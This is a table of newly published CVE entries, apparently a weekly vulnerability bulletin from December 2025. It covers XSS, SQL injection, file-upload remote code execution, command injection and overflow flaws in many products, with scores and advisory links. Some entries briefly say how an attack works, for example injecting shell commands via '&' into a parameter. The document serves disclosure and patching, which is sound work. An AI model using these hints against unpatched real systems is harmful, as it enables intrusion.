| Microsoft--Microsoft Edge for Android | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2025-12-18 | 3.1 | CVE-2025-65046 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, stored XSS was possible on the agentpushInstall page. | 2025-12-16 | 3.5 | CVE-2025-68163 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Debian--FreedomBox | Freedombox before 25.17.1 does not set proper permissions for the backups-data directory, allowing the reading of dump files of databases. | 2025-12-18 | 3.2 | CVE-2025-68462 | https://salsa.debian.org/freedombox-team/freedombox/-/commit/8ba444990b4af6eec4b6b2b26482b107d |
| wpvividplugins--Migration, Backup, Staging WPvivid Backup & Migration | The Migration, Backup, Staging - WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories. | 2025-12-21 | 2.7 | CVE-2025-12654 | https://www.wordfence.com/threat-intel/vulnerabilities/id/662aa8dd-69b7-49e3-811c-04329544e106?source=cve https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1535 https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1571 https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1568 https://wordpress.org/plugins/wpvivid-backuprestore/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397673%40wpvivid-backuprestore&new=3397673%40wpvivid-backuprestore&sfp_email=&sfph_mail= |
| vion707--DMadmin | A vulnerability was determined in vion707 DMadmin up to 3403cafdb42537a648c30bf8cbc8148ec60437d1. This impacts the function Add of the file Admin/Controller/AddonsController.class.php of the component Backend. Executing manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 2.4 | CVE-2025-14722 | VDB-336467 \| vion707 DMadmin Backend AddonsController.class.php add cross site scripting VDB-336467 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707130 \| 大漠急速开发 DMadmin Based on ThinkPhp 3.23 development version xss https://github.com/DeepMountains/zzz/blob/main/CVE-2025-2-2.md |
| xiweicheng--TMS | A security vulnerability has been detected in xiweicheng TMS up to 2.28.0. This affects the function createComment of the file /admin/blog/comment/create. Such manipulation of the argument content leads to cross site scripting. The attack may be performed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-17 | 2.4 | CVE-2025-14801 | VDB-336939 \| xiweicheng TMS create createComment cross site scripting VDB-336939 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708322 \| xiweicheng TMS v2.28.0 Cross Site Scripting https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/TMS_v2.28.0_XSS-1.md |
| ZZCMS--ZZCMS | A flaw has been found in ZZCMS 2025. Affected by this vulnerability is an unknown functionality of the file /reg/user_save.php of the component User Data Storage Module. This manipulation causes cleartext storage in a file or on disk. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2025-12-17 | 2.7 | CVE-2025-14836 | VDB-336986 \| ZZCMS User Data Storage user_save.php cleartext storage in a file or on disk VDB-336986 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #711654 \| zzcms zzcms2025 Plaintext Password in Configuration File https://note-hxlab.wetolink.com/share/bu2KYevoyBm6 |
| Campcodes--Complete Online Beauty Parlor Management System | A weakness has been identified in Campcodes Complete Online Beauty Parlor Management System 1.0. The affected element is an unknown function of the file /admin/bwdates-reports-details.php. Executing manipulation of the argument fromdate can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-21 | 2.4 | CVE-2025-14991 | VDB-337685 \| Campcodes Complete Online Beauty Parlor Management System bwdates-reports-details.php cross site scripting VDB-337685 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #718458 \| campcodes Complete Online Beauty Parlor Management System V1.0 cross site scripting https://github.com/funnnxxx/my-cve/issues/1 https://www.campcodes.com/ |
| Sunbird--Sunbird | An error-based SQL injection vulnerability exists in the Sunbird Power IQ 9.2.0 API. The vulnerability is due to an outdated API endpoint that applied arrays without proper input validation. This can allow attackers to manipulate SQL queries. This has been addressed in Power IQ version 9.2.1, where the API call code was updated to ensure safe handling of input values. | 2025-12-15 | 2.5 | CVE-2025-55703 | https://www.sunbirddcim.com/ https://pastebin.com/C6hVPpF4 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, the maven embedder allowed loading extensions via project configuration. | 2025-12-16 | 2.7 | CVE-2025-68162 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, port enumeration was possible via the Perforce connection test. | 2025-12-16 | 2.7 | CVE-2025-68164 | https://www.jetbrains.com/privacy-security/issues-fixed/ |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Netaxis--Netaxis | Netaxis API Orchestrator (APIO) before 0.19.3 allows server side template injection (SSTI). | 2025-12-17 | not yet calculated | CVE-2022-23851 | https://www.netaxis.be/products/apio/ https://blog.tig00r.me/post/CVE-2022-23851 |
| Inventory Management Systems--Inventory Management systems | A reflected cross-site scripting (XSS) vulnerability in the component /index.php/cuzh4 of PHP Inventory Management System 1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-12-15 | not yet calculated | CVE-2023-36337 | https://github.com/ThuanNguyen115685/Report/blob/main/XSS.md https://gist.github.com/nguyenkhanhthuan/f345c8ea0551c10ead197680f2ba9c66 |
| Inventory Management Systems--Inventory Management systems | Inventory Management System 1 was discovered to contain a SQL injection vulnerability. | 2025-12-15 | not yet calculated | CVE-2023-36338 | https://github.com/ThuanNguyen115685/Report/blob/main/SQLI.md https://gist.github.com/nguyenkhanhthuan/5294a28bb111f11da4b1f4f1bddf88c8 |
| anirbandutta--NEW-BUZZ | SQL injection vulnerability in anirbandutta9 NEWS-BUZZ v.1.0 allows a remote attacker to execute arbitrary code via a crafted script. | 2025-12-15 | not yet calculated | CVE-2023-38913 | https://github.com/ThuanNguyen115685/Report/blob/main/sqlinjection.md https://gist.github.com/nguyenkhanhthuan/03ce706686508b14506d38788c754dfb |
| Coppermine--coppermine-gallery | Coppermine Gallery 1.6.25 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the plugin manager. Attackers can upload a zipped PHP file with system commands to the plugin directory and execute arbitrary code by accessing the uploaded plugin script. | 2025-12-15 | not yet calculated | CVE-2023-53868 | ExploitDB-51738 Coppermine Gallery Archived Product Webpage https://www.vulncheck.com/advisories/coppermine-gallery-remote-code-execution-via-plugin-upload |
| WebIGniter--WebIGniter | WEBIGniter 28.7.23 contains a file upload vulnerability that allows authenticated attackers to upload and execute dangerous PHP files through the media function. Attackers can leverage any created account to upload malicious PHP scripts that enable remote code execution on the application server. | 2025-12-15 | not yet calculated | CVE-2023-53869 | ExploitDB-51736 Webigniter Product Webpage VulnCheck Advisory: WEBIGniter 28.7.23 Unrestricted File Upload Remote Code Execution |
| Jorani--Jorani | Jorani 1.0.3 contains a reflected cross-site scripting vulnerability in the language parameter that allows attackers to inject malicious scripts. Attackers can craft XSS payloads in the language parameter to execute arbitrary JavaScript and potentially steal user session information. | 2025-12-15 | not yet calculated | CVE-2023-53870 | ExploitDB-51715 Jorani Product Webpage VulnCheck Advisory: Jorani 1.0.3 Cross-Site Scripting Vulnerability via Language Parameter |
| Soosyze--Soosyze | Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server. | 2025-12-15 | not yet calculated | CVE-2023-53871 | ExploitDB-51718 soosyze Product Homepage soosyze GitHub Repository VulnCheck Advisory: Soosyze 2.0.0 Unrestricted File Upload via Broken Upload Logic |
| wp2fac--Wp2Fac | Wp2Fac 1.0 contains an OS command injection vulnerability in the send.php endpoint that allows remote attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'numara' parameter by appending shell commands with '&' operators to execute malicious code. | 2025-12-15 | not yet calculated | CVE-2023-53872 | ExploitDB-51717 wp2fac GitHub Repository VulnCheck Advisory: Wp2Fac 1.0 OS Command Injection via send.php Endpoint |
| Syncbreeze--SyncBreeze | SyncBreeze 15.2.24 contains a denial of service vulnerability in the login authentication mechanism that allows attackers to crash the service. Attackers can send an oversized password parameter with repeated 'password=' values to overwhelm the login endpoint and potentially disrupt service availability. | 2025-12-15 | not yet calculated | CVE-2023-53873 | ExploitDB-51725 SyncBreeze Product Webpage VulnCheck Advisory: SyncBreeze 15.2.24 Denial of Service via Login Endpoint Overflow |
| Gomlab--GOM Player | GOM Player 2.3.90.5360 contains a buffer overflow vulnerability in the equalizer preset name input field that allows attackers to crash the application. Attackers can overwrite the preset name with 260 'A' characters to trigger a buffer overflow and cause application instability. | 2025-12-15 | not yet calculated | CVE-2023-53874 | ExploitDB-51724 GOM Lab Vendor Webpage VulnCheck Advisory: GOM Player 2.3.90.5360 Buffer Overflow via Equalizer Preset Name |
| Gomlab--GOM Player | GOM Player 2.3.90.5360 contains a remote code execution vulnerability in its Internet Explorer component that allows attackers to execute arbitrary code through DNS spoofing. Attackers can redirect victims using a malicious URL shortcut and WebDAV technique to run a reverse shell with SMB server interaction. | 2025-12-15 | not yet calculated | CVE-2023-53875 | ExploitDB-51719 GOM Lab Vendor Webpage VulnCheck Advisory: GOM Player 2.3.90.5360 Remote Code Execution via Insecure IE Component |
| Creativeitem--Academy LMS | Academy LMS 6.1 contains a file upload vulnerability that allows authenticated users to upload malicious SVG files with stored cross-site scripting payloads. Attackers can inject malicious scripts through the profile avatar upload feature by modifying file extensions and embedding executable JavaScript code. | 2025-12-15 | not yet calculated | CVE-2023-53876 | ExploitDB-51702 Academy LMS Product Webpage VulnCheck Advisory: Academy LMS 6.1 Arbitrary File Upload Vulnerability via Profile Settings |
| Phpjabbers--Bus Reservation System | Bus Reservation System 1.1 contains a SQL injection vulnerability in the pickup_id parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, and time-based blind SQL injection techniques to steal information from the database. | 2025-12-15 | not yet calculated | CVE-2023-53877 | ExploitDB-51712 Product Webpage VulnCheck Advisory: Bus Reservation System 1.1 Multiple SQL Injection via pickup_id Parameter |
| Phpjabbers--Member Login Script | Member Login Script 3.3 contains a client-side desynchronization vulnerability that allows attackers to manipulate HTTP request handling by exploiting Content-Length header parsing. Attackers can send crafted POST requests with smuggled secondary requests to potentially bypass server-side request processing controls. | 2025-12-15 | not yet calculated | CVE-2023-53878 | ExploitDB-51710 Product Webpage VulnCheck Advisory: Member Login Script 3.3 Client-Side Request Desynchronization Vulnerability |
| neonguvenlik--NVClient | NVClient 5.0 contains a stack buffer overflow vulnerability in the user configuration contact field that allows attackers to crash the application. Attackers can overwrite 846 bytes of memory by pasting a crafted payload into the contact box, causing a denial of service condition. | 2025-12-15 | not yet calculated | CVE-2023-53879 | ExploitDB-51700 NVClient Product Documentation VulnCheck Advisory: NVClient 5.0 Stack Buffer Overflow Vulnerability via User Configuration |
| Lucee--Lucee | Lucee 5.4.2.17 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through administrative interface parameters. Attackers can craft specific payloads targeting admin pages like server.cfm and web.cfm to execute arbitrary JavaScript in victims' browser sessions. | 2025-12-15 | not yet calculated | CVE-2023-53880 | ExploitDB-51668 Lucee Product Webpage VulnCheck Advisory: Lucee 5.4.2.17 Authenticated Reflected Cross-Site Scripting via Admin Interfaces |
| Ruijie--ReyeeOS | ReyeeOS 1.204.1614 contains an unencrypted CWMP communication vulnerability that allows attackers to intercept and manipulate device communication through a man-in-the-middle attack. Attackers can create a fake CWMP server to inject and execute arbitrary commands on Ruijie Reyee Cloud devices by exploiting the unprotected HTTP polling requests. | 2025-12-15 | not yet calculated | CVE-2023-53881 | ExploitDB-51642 Ruijie Networks Vendor Homepage VulnCheck Advisory: ReyeeOS 1.204.1614 Man-in-the-Middle Remote Code Execution via CWMP |
| jlexart--JLex GuestBook | JLex GuestBook 1.6.4 contains a reflected cross-site scripting vulnerability in the 'q' URL parameter that allows attackers to inject malicious scripts. Attackers can craft malicious links with XSS payloads to steal session tokens or execute arbitrary JavaScript in victims' browsers. | 2025-12-15 | not yet calculated | CVE-2023-53882 | ExploitDB-51647 JLexArt Vendor Webpage VulnCheck Advisory: JLex GuestBook 1.6.4 Reflected Cross-Site Scripting via URL Parameter |
| Webedition--Webedition CMS | Webedition CMS v2.9.8.8 contains a remote code execution vulnerability that allows authenticated attackers to inject system commands through PHP page creation. Attackers can create a new PHP page with malicious system commands in the description field to execute arbitrary commands on the server. | 2025-12-15 | not yet calculated | CVE-2023-53883 | ExploitDB-51661 webEdition Product Webpage VulnCheck Advisory: Webedition CMS v2.9.8.8 Remote Code Execution via PHP Page Creation |
| Webedition--Webedition CMS | Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users. | 2025-12-15 | not yet calculated | CVE-2023-53884 | ExploitDB-51662 webEdition Product Webpage VulnCheck Advisory: Webedition CMS v2.9.8.8 Stored Cross-Site Scripting via SVG Upload |
| Webutler--Webutler | Webutler v3.2 contains a remote code execution vulnerability that allows authenticated administrators to upload PHP files with system command execution. Attackers can upload a PHAR file with embedded system commands to the media browser and execute arbitrary commands by accessing the uploaded file. | 2025-12-15 | not yet calculated | CVE-2023-53885 | ExploitDB-51660 WEButler Product Homepage VulnCheck Advisory: Webutler v3.2 Remote Code Execution via Arbitrary File Upload |
| Xlightftpd--Xlight FTP Server | Xlight FTP Server 3.9.3.6 contains a stack buffer overflow vulnerability in the 'Execute Program' configuration that allows attackers to crash the application. Attackers can trigger the vulnerability by inserting 294 characters into the program execution configuration, causing a denial of service condition. | 2025-12-15 | not yet calculated | CVE-2023-53886 | ExploitDB-51665 XLight FTP Server VulnCheck Advisory: Xlight FTP Server 3.9.3.6 Stack Buffer Overflow Vulnerability via Execute Program |
| Zomplog--Zomplog | Zomplog 3.9 contains a cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating new pages. Attackers can craft malicious image source and onerror attributes to execute arbitrary JavaScript code in the victim's browser. | 2025-12-15 | not yet calculated | CVE-2023-53887 | ExploitDB-51625 Zomplog Archived Product Webpage VulnCheck Advisory: Zomplog 3.9 Cross-Site Scripting Vulnerability via Page Creation |
| Zomplog--Zomplog | Zomplog 3.9 contains a remote code execution vulnerability that allows authenticated attackers to inject and execute arbitrary PHP code through file manipulation endpoints. Attackers can upload malicious JavaScript files, rename them to PHP, and execute system commands by exploiting the saveE and rename actions in the application. | 2025-12-15 | not yet calculated | CVE-2023-53888 | ExploitDB-51624 Zomplog Archived Product Webpage VulnCheck Advisory: Zomplog 3.9 Remote Code Execution via Authenticated File Manipulation |
| Perch--Perch | Perch CMS 3.2 contains a remote code execution vulnerability that allows authenticated administrators to upload arbitrary PHP files through the assets management interface. Attackers can upload a malicious .phar file with embedded system command execution capabilities to execute arbitrary commands on the server. | 2025-12-15 | not yet calculated | CVE-2023-53889 | ExploitDB-51620 Perch Product Webpage VulnCheck Advisory: Perch CMS 3.2 Remote Code Execution via Unrestricted File Upload |
| Perch--Perch | Perch CMS 3.2 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can craft SVG files with script tags that execute when the file is viewed, potentially stealing user session information or performing client-side attacks. | 2025-12-15 | not yet calculated | CVE-2023-53890 | ExploitDB-51621 Perch Product Webpage VulnCheck Advisory: Perch CMS 3.2 Stored Cross-Site Scripting via SVG File Upload |
| blackcat-cms--Blackcat CMS | Blackcat CMS 1.4 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into page content. Attackers can insert JavaScript payloads in the page modification interface that execute when other users view the compromised page. | 2025-12-15 | not yet calculated | CVE-2023-53891 | ExploitDB-51604 BlackCat CMS Product Webpage VulnCheck Advisory: Blackcat CMS 1.4 Stored Cross-Site Scripting via Page Modification |
| blackcat-cms--Blackcat CMS | Blackcat CMS 1.4 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the jquery plugin manager. Attackers can upload a zip file with a PHP shell script and execute arbitrary system commands by accessing the uploaded plugin's PHP file with a 'code' parameter. | 2025-12-15 | not yet calculated | CVE-2023-53892 | ExploitDB-51605 BlackCat CMS Product Webpage VulnCheck Advisory: Blackcat CMS 1.4 Remote Code Execution via Jquery Plugin Manager |
| Ateme--TITAN | Ateme TITAN File 3.9.12.4 contains an authenticated server-side request forgery vulnerability in the job callback URL parameter that allows attackers to bypass network restrictions. Attackers can exploit the unvalidated parameter to initiate file, service, and network enumeration by forcing the application to make HTTP, DNS, or file requests to arbitrary destinations. | 2025-12-15 | not yet calculated | CVE-2023-53893 | ExploitDB-51582 Zero Science Lab Disclosure (ZSL-2023-5781) Ateme Titan Product Webpage VulnCheck Advisory: Ateme TITAN File 3.9 Authenticated Server-Side Request Forgery Vulnerability |
| python-jose--python-jose | In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. | 2025-12-17 | not yet calculated | CVE-2024-29370 | https://github.com/mpdavis/python-jose/issues/344 |
| python-jose--python-jose | In jose4j before 0.9.5, an attacker can cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. | 2025-12-17 | not yet calculated | CVE-2024-29371 | https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack |
| FNT--FNT | FNT Command 13.4.0 is vulnerable to Code Execution via the C Base Module. | 2025-12-15 | not yet calculated | CVE-2024-44598 | http://fnt.com https://gist.github.com/ZeroBreach-GmbH/e957dc32e72b366894565b7ff03659a4 |
| FNT--FNT | FNT Command 13.4.0 is vulnerable to Directory Traversal. | 2025-12-15 | not yet calculated | CVE-2024-44599 | http://fnt.com https://gist.github.com/ZeroBreach-GmbH/577755034cb5c0423fbb0bba659b915d |
| Anaconda3--Apple | Anaconda3 macOS installers before 2024.06-1 contain a local privilege escalation vulnerability when installed outside the user's home directory. During installation, world-writable files are created and executed with root privileges. This allows a local low-privileged user to inject arbitrary commands, leading to code execution as the root user. | 2025-12-17 | not yet calculated | CVE-2024-46060 | https://m8sec.dev/blog/privilege-escalation-macos-pkg-installers/ https://www.anaconda.com/docs/getting-started/anaconda/release/2024.x#anaconda-2024-06-1 |
| Miniconda3--Apple | Miniconda3 macOS installers before 23.11.0-1 contain a local privilege escalation vulnerability when installed outside the user's home directory. During installation, world-writable files are created and executed with root privileges. This flaw allows a local low-privileged user to inject arbitrary commands, leading to code execution as the root user. | 2025-12-17 | not yet calculated | CVE-2024-46062 | https://m8sec.dev/blog/privilege-escalation-macos-pkg-installers/ https://www.anaconda.com/docs/getting-started/miniconda/release/23.x#miniconda-23-11-0-1 |
| codepeople--Contact Form Email | Authorization Bypass Through User-Controlled Key vulnerability in codepeople Contact Form Email contact-form-to-email allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form Email: from n/a through <= 1.3.60. | 2025-12-18 | not yet calculated | CVE-2025-10019 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-to-email/vulnerability/wordpress-contact-form-email-plugin-1-3-59-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| RTI--Connext Professional | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in RTI Connext Professional (Core Libraries) allows Sniffing Network Traffic. This issue affects Connext Professional: from 7.4.0 before 7.*, from 7.2.0 before 7.3.1. | 2025-12-16 | not yet calculated | CVE-2025-10450 | https://www.rti.com/vulnerabilities/#cve-2025-10450 |
| Govee--H6056 | A flaw in the binding process of Govee's cloud platform and devices allows a remote attacker to bind an existing, online Govee device to the attacker's account, resulting in full control of the device and removal of the device from its legitimate owner's account. The server-side API allows device association using a set of identifiers: "device", "sku", "type", and a client-computed "value", that are not cryptographically bound to a secret originating from the device itself. The vulnerability has been verified for the Govee H6056 lamp device in firmware version 1.08.13, but may also affect other Govee cloud-connected devices. The vendor is investigating other potentially affected models. The vendor has deployed server-side security enhancements and automatic firmware updates for model H6056. Most H6056 devices have been successfully patched through automatic updates. Remaining H6056 users with upgradeable hardware versions must manually update firmware through the Govee Home app while keeping their device WiFi-connected. Users should open the Govee Home app, tap their H6056 device card to enter the device details page, tap the settings icon in the upper right corner, navigate to the Device Information section (Firmware Version), and tap the Update button to install the security patch immediately. Govee H6056 devices with hardware versions 1.00.10 or 1.00.11 cannot receive a firmware update due to hardware limitations. | 2025-12-18 | not yet calculated | CVE-2025-10910 | https://cert.pl/en/posts/2025/12/CVE-2025-10910/ |
| Unknown--Royal Addons for Elementor | The Royal Addons for Elementor WordPress plugin before 1.7.1037 does not have proper authorisation, allowing unauthenticated users to upload media files via the wpr_addons_upload_file action. | 2025-12-15 | not yet calculated | CVE-2025-11363 | https://wpscan.com/vulnerability/b2eadb7a-30a4-44c7-a420-849484faccf4/ |
| ASUS--Armoury Crate | An out-of-bounds read vulnerability has been identified in the asComSvc service. This vulnerability can be triggered by sending specially crafted requests, which may lead to a service crash or partial loss of functionality. This vulnerability only affects ASUS motherboard series products. Refer to the 'Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information. | 2025-12-17 | not yet calculated | CVE-2025-11775 | https://www.asus.com/security-advisory |
| ASUS--B460 series | An uncontrolled resource consumption vulnerability affects certain ASUS motherboards using Intel B460, B560, B660, B760, H410, H510, H610, H470, Z590, Z690, Z790, W480, W680 series chipsets. Exploitation requires physical access to internal expansion slots to install a specially crafted device and supporting software utility, and may lead to uncontrolled resource consumption that increases the risk of unauthorized direct memory access (DMA). Refer to the 'Security Update for UEFI firmware' section on the ASUS Security Advisory for more information. | 2025-12-17 | not yet calculated | CVE-2025-11901 | https://www.asus.com/security-advisory/ |
| Unknown--URL Shortify | The URL Shortify WordPress plugin before 1.11.3 does not sanitize and escape a parameter before outputting it back in the page, leading to a reflected cross-site scripting, which could be used against high-privilege users such as admins. | 2025-12-15 | not yet calculated | CVE-2025-12684 | https://wpscan.com/vulnerability/8f1e04c6-8781-4366-99d9-9a59102957cf/ |
| Unknown--Pure WC Variation Swatches | The Pure WC Variation Swatches WordPress plugin through 1.1.7 does not have an authorization check when updating its settings, which could allow any authenticated users to update them. | 2025-12-20 | not yet calculated | CVE-2025-12820 | https://wpscan.com/vulnerability/36ccd54a-265a-44d5-b788-bc14446e3098/ |
| Quest--Coexistence Manager for Notes | Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Quest Coexistence Manager for Notes (Free/Busy Connector modules) allows HTTP Request Smuggling via the Content-Length-Transfer-Encoding (CL.TE) attack vector. This could allow an attacker to bypass access controls, poison web caches, hijack sessions, or trigger unintended internal requests. This issue affects Coexistence Manager for Notes 3.8.2045. Other versions may also be affected. | 2025-12-19 | not yet calculated | CVE-2025-12874 | https://support.quest.com/coexistence-manager-for-notes/3.10 https://sra.io/advisories/ |
| M-Files Corporation--M-Files Server | An information disclosure vulnerability in M-Files Server before versions 25.12.15491.7, 25.8 LTS SR3, 25.2 LTS SR3 and 24.8 LTS SR5 allows an authenticated attacker using M-Files Web to capture session tokens of other active users. | 2025-12-19 | not yet calculated | CVE-2025-13008 | https://product.m-files.com/security-advisories/cve-2025-13008 |
| Unknown--Ocean Modal Window | The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution. | 2025-12-19 | not yet calculated | CVE-2025-13307 | https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/ |
| Unknown--URL Shortify | The URL Shortify WordPress plugin before 1.11.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-15 | not yet calculated | CVE-2025-13355 | https://wpscan.com/vulnerability/8581af77-2d72-48e8-9b22-2c36f122473c/ |
| Google Cloud--Dialogflow CX Messenger | An authentication bypass vulnerability in Google Cloud Dialogflow CX Messenger allowed unauthenticated users to interact with restricted chat agents, gaining access to the agents' knowledge and the ability to trigger their intents, by manipulating initialization parameters or crafting specific API requests. All versions after August 20th, 2025 have been updated to protect from this vulnerability. No user action is required for this. | 2025-12-18 | not yet calculated | CVE-2025-13427 | https://docs.cloud.google.com/dialogflow/docs/release-notes#December_11_2025 |
| Rockwell Automation--Micro820, Micro850, Micro870 | A security issue was found in the IPv6 stack in the Micro850 and Micro870 controllers when the controllers received multiple malformed packets during fuzzing. The controllers will go into recoverable fault with fault code 0xFE60. To recover the controller, clear the fault. | 2025-12-15 | not yet calculated | CVE-2025-13823 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1766.html |
| Rockwell Automation--Micro820, Micro850, Micro870 | A security issue exists due to improper handling of malformed CIP packets during fuzzing. The controller enters a hard fault with solid red Fault LED and becomes unresponsive. Upon power cycle, the controller will enter recoverable fault where the MS LED and Fault LED become flashing red and reports fault code 0xF019. To recover, clear the fault. | 2025-12-15 | not yet calculated | CVE-2025-13824 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1766.html |
| Linkding--LinkDing | A vulnerability in the bookmark file upload and asset rendering pipeline allows an attacker to upload a malicious SVG file with JavaScript content. When an authenticated admin user views the SVG file with embedded JavaScript code of a shared bookmark, the JavaScript executes in the admin's browser, retrieves the CSRF token, and sends a request to change the admin's password, resulting in a full account takeover. | 2025-12-17 | not yet calculated | CVE-2025-14202 | https://www.cve.org/cverecord?id=CVE-2025-14202 |
| Ercom--Cryptobox | CSRF in the Ercom Cryptobox administration console allows an attacker to trigger some actions on behalf of a Cryptobox administrator. The attack requires the administrator to browse a malicious web site or to click a link while they have an open session on the administration console. | 2025-12-17 | not yet calculated | CVE-2025-14266 | https://info.cryptobox.com/doc/v4.39/4.39.en/#fix2 |
| M-Files Corporation--M-Files Server | Incomplete removal of sensitive information before transfer vulnerability in M-Files Corporation M-Files Server allows data leak exposure, affecting versions before 25.12.15491.7. | 2025-12-19 | not yet calculated | CVE-2025-14267 | https://product.m-files.com/security-advisories/cve-2025-14267/ |
| TP-Link Systems Inc.--Tapo C200 V3 | The HTTPS server on Tapo C200 V3 does not properly validate the Content-Length header, which can lead to an integer overflow. An unauthenticated attacker on the same local network segment can send crafted HTTPS requests to trigger excessive memory allocation, causing the device to crash and resulting in denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-14299 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
| TP-Link Systems Inc.--Tapo C200 V3 | The HTTPS service on Tapo C200 V3 exposes a connectAP interface without proper authentication. An unauthenticated attacker on the same local network segment can exploit this to modify the device's Wi-Fi configuration, resulting in loss of connectivity and denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-14300 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
| Roxnor--PopupKit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roxnor PopupKit popup-builder-block allows Blind SQL Injection. This issue affects PopupKit: from n/a through <= 2.1.5. | 2025-12-18 | not yet calculated | CVE-2025-14314 | https://vdp.patchstack.com/database/Wordpress/Plugin/popup-builder-block/vulnerability/wordpress-popupkit-plugin-2-1-5-sql-injection-vulnerability?_s_id=cve |
| M-Files Corporation--M-Files Server | Improper access checks in M-Files Server before 25.12.15491.7 allow users to download files through M-Files Web using Web Companion despite the Print and Download Prevention module being enabled. | 2025-12-18 | not yet calculated | CVE-2025-14318 | https://product.m-files.com/security-advisories/cve-2025-14318/ |
| HP Inc--Poly G7500 | In limited scenarios, sensitive data might be written to the log file if an admin uses Microsoft Teams Admin Center (TAC) to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration changes made using the provisioning server or the device WebUI. | 2025-12-16 | not yet calculated | CVE-2025-14432 | https://support.hp.com/us-en/document/ish_13612310-13612332-16/hpsbpy04080 |
| Eclipse OMR--Eclipse OMR | In the Eclipse OMR compiler component, since release 0.7.0, an optimization enabled for Eclipse OpenJ9 consumers of OMR on Z processors incorrectly handles NUL (0x00) characters during the Latin-compatible charset (UTF-8, ISO8859-1, ASCII, etc) to IBM-1047/037 translation sequence. This can cause the output byte array to be truncated, discarding the first NUL byte and all subsequent characters, and thereby exposing a possible buffer over-read problem. This issue is fixed in Eclipse OMR version 0.8.0. | 2025-12-15 | not yet calculated | CVE-2025-14549 | https://github.com/eclipse-omr/omr/pull/8073 |
